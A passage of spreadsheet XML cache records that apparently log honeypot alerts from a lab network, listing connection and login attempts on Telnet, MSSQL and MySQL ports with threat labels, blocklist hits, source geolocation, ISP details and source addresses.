    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="NA"/>
    <s v="21.1959"/>
    <s v="72.8302"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:973d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2850"/>
    <x v="2850"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T18:15:06"/>
    <d v="2025-04-06T18:13:07"/>
    <d v="2025-04-06T18:15:06"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Kirti Nagar Industrial Area)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6472"/>
    <s v="77.1449"/>
    <s v="133712"/>
    <s v="Spectra Technologies India Private Limited"/>
    <s v="Spectra Technologies India Private Limited"/>
    <s v="hosting"/>
    <s v="Spectra Technologies India Private Limited"/>
    <s v="2015-01-05"/>
    <s v="SPECTRACLOUD"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:672f:96dc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2851"/>
    <x v="2851"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T18:01:28"/>
    <d v="2023-11-24T14:11:12"/>
    <d v="2025-04-06T18:01:28"/>
    <n v="177"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;13839&amp;&amp;61152&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2eb9:3c17"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2852"/>
    <x v="2852"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T17:05:06"/>
    <d v="2025-04-06T13:04:17"/>
    <d v="2025-04-06T17:05:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:51bc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2853"/>
    <x v="2853"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T16:47:01"/>
    <d v="2024-05-21T16:45:30"/>
    <d v="2025-04-06T16:47:01"/>
    <n v="5608"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;9652&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="2010-05-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:d77b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2854"/>
    <x v="2854"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T16:32:21"/>
    <d v="2025-04-06T16:32:21"/>
    <d v="2025-04-06T16:32:21"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f4:5f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2855"/>
    <x v="2855"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T16:17:32"/>
    <d v="2025-04-04T23:03:36"/>
    <d v="2025-04-06T16:17:32"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="KU"/>
    <s v="Al Asimah"/>
    <s v="NA"/>
    <s v="Kuwait City (Jibla)"/>
    <s v="285787"/>
    <s v="NA"/>
    <s v="29.3716"/>
    <s v="47.9736"/>
    <s v="42961"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="cellular"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2524:5b7a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2856"/>
    <x v="2856"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T16:00:47"/>
    <d v="2025-02-14T11:16:44"/>
    <d v="2025-04-06T16:00:47"/>
    <n v="317"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IA"/>
    <s v="Iowa"/>
    <s v="Polk"/>
    <s v="Des Moines"/>
    <s v="4853828"/>
    <s v="50307"/>
    <s v="41.5868"/>
    <s v="-93.625"/>
    <s v="30036"/>
    <s v="Mediacom Communications Corp"/>
    <s v="Mediacom Communications Corp"/>
    <s v="business"/>
    <s v="Mediacom Communications Corp"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ad1f:93c"/>
    <s v="C-I"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2857"/>
    <x v="2857"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T15:55:12"/>
    <d v="2025-04-06T15:55:12"/>
    <d v="2025-04-06T15:55:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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d:9f89"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2858"/>
    <x v="2858"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T15:49:54"/>
    <d v="2024-07-10T18:18:00"/>
    <d v="2025-04-06T15:49:54"/>
    <n v="388"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_SSH_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;37489"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar PJSC"/>
    <s v="residential"/>
    <s v="Kyivstar GSM"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:ce4f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2859"/>
    <x v="2859"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T15:43:32"/>
    <d v="2025-02-25T13:03:24"/>
    <d v="2025-04-06T15:43:32"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75dd:78df"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2860"/>
    <x v="2860"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T15:39:26"/>
    <d v="2025-04-05T04:55:51"/>
    <d v="2025-04-06T15:39:26"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;23609"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="12"/>
    <s v="Dnipropetrovsk"/>
    <s v="Dnipro rural raion"/>
    <s v="Dnipro (Sobornyi District)"/>
    <s v="709930"/>
    <s v="NA"/>
    <s v="48.4484"/>
    <s v="35.0733"/>
    <s v="15377"/>
    <s v="TRADITIONAL LLC"/>
    <s v="ISP Fregat"/>
    <s v="residential"/>
    <s v="ISP Fregat Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e62:99e2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2861"/>
    <x v="2861"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T15:35:02"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-06T15:35:02"/>
    <n v="98"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;52094&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="LA"/>
    <s v="Lampung"/>
    <s v="Tanggamus Regency"/>
    <s v="Kota Agung"/>
    <s v="8537084"/>
    <s v="NA"/>
    <s v="-5.50257"/>
    <s v="104.645"/>
    <s v="138881"/>
    <s v="PT INDONESIA TRANS NETWORK"/>
    <s v="PT INDONESIA TRANS NETWORK"/>
    <s v="business"/>
    <s v="CV Gisting Trans Network"/>
    <s v="2022-12-23"/>
    <s v="IDNIC-GISTINGTRANS-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:673b:2c66"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2862"/>
    <x v="2862"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T15:27:24"/>
    <d v="2025-03-25T20:11:48"/>
    <d v="2025-04-06T15:27:24"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="02"/>
    <s v="Lower Silesia"/>
    <s v="Jelenia Góra County"/>
    <s v="Sosnówka"/>
    <s v="3085119"/>
    <s v="NA"/>
    <s v="50.8183"/>
    <s v="15.7232"/>
    <s v="198709"/>
    <s v="Jacek Jarosz trading as Info Serwis"/>
    <s v="Jacek Jarosz trading as Info Serwis"/>
    <s v="business"/>
    <s v="Jacek Jarosz trading as Info Serwis"/>
    <s v="2012-04-16"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b072:ea26"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2863"/>
    <x v="2863"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T14:56:16"/>
    <d v="2025-04-06T14:56:16"/>
    <d v="2025-04-06T14:56:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="GZ"/>
    <s v="Giza"/>
    <s v="Dokki"/>
    <s v="Giza"/>
    <s v="360995"/>
    <s v="NA"/>
    <s v="30.0384"/>
    <s v="31.2098"/>
    <s v="8452"/>
    <s v="TE-AS"/>
    <s v="TE Data"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:292f:b05c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2864"/>
    <x v="2864"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T14:51:12"/>
    <d v="2025-04-06T14:49:39"/>
    <d v="2025-04-06T14:51:12"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Quận Nam Từ Liêm"/>
    <s v="Cầu Diễn"/>
    <s v="8616055"/>
    <s v="NA"/>
    <s v="21.0393"/>
    <s v="105.767"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="FPTDYNAMICIP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a72:d6e4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2865"/>
    <x v="2865"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T14:00:58"/>
    <d v="2025-04-03T00:47:01"/>
    <d v="2025-04-06T14:00:58"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
